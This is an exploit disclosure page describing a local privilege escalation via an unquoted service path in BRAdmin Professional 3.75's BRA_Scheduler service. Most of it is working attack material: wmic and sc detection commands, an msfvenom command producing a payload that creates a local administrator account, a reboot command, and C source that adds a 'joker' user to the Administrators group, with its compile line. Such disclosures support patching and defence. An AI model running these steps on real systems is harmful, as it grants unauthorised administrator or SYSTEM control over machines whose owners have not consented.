> For the complete documentation index, see [llms.txt](https://docs.unsafe-inline.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.unsafe-inline.com/0day/bradmin-professional-3.75-unquoted-service-path.md).

# BRAdmin Professional 3.75 - Unquoted Service Path

*"BRAdmin Professional 3.75 software allows system administrators to view and control the status of their networked Brother and most other SNMP compliant printing devices."*

## Proof Of Concept

If a user can insert a executable which is called as "BRAdmin" under the `C:\Program Files (x86)\Brother\` directory , local system privileges could be obtained by the user.&#x20;

For example, an user that has administrative privileges can obtain **`SYSTEM`** privileges through the vulnerable service.&#x20;

This situation is valuable, especially if additional writing permission is applied to `\Brother\` directory for unprivileged user.

```
#Detection of unquoted service path:

C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "BRAdmin" |findstr /i /v """
Brother BRAdminPro Scheduler
BRA_Scheduler                             
C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe                 
Auto


C:\>sc qc BRA_Scheduler
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: BRA_Scheduler
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Brother BRAdminPro Scheduler
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
```

### Steps to Reproduce:

1- User has a write privilege to `\Brother\` directory and creates msfvenom payload that adds new localadmin user to Windows computer.

```
msfvenom -p windows/adduser USER=unsafe PASS=In.line13 -f exe > BRAdmin.exe 
```

![](/files/-MW606TdKMT5kaEvNWVP)

2- Then user downloads this executable under the `\Brother\` directory and restarts the computer.

![](/files/-MW61MLiQVlXsP-RHuzg)

![](/files/-MW61SiZLh4N3XUrf6iS)

For restarting computer from command line:

```
shutdown /r /t 0
```

3- After the restarting process , `unsafe` user will be created and added the local Administrators group.

![](/files/-MW63ikVCka-O_O1Fz_f)

Windows Defender will detect the `BRAdmin.exe` executable as malicious after the `unsafe`user is added the local administrators group if target didn't make last Windows update properly.&#x20;

![](/files/-MW67LrjVf9X8HtXyIAr)

Or below code could be used after compiling with gcc.&#x20;

```
#include <stdlib.h>
int main ()
{
int i;
    i = system("net user joker j@k3r.. /add & net localgroup Administrators joker /add");
return 0;
}
```

`i686-w64-mingw32-gcc addLocalAdmin.c -lws2_32 -o add.exe`

{% embed url="<https://www.exploit-db.com/exploits/49671>" %}

<pre><code><strong># Author: Metin Yunus Kandemir
</strong></code></pre>
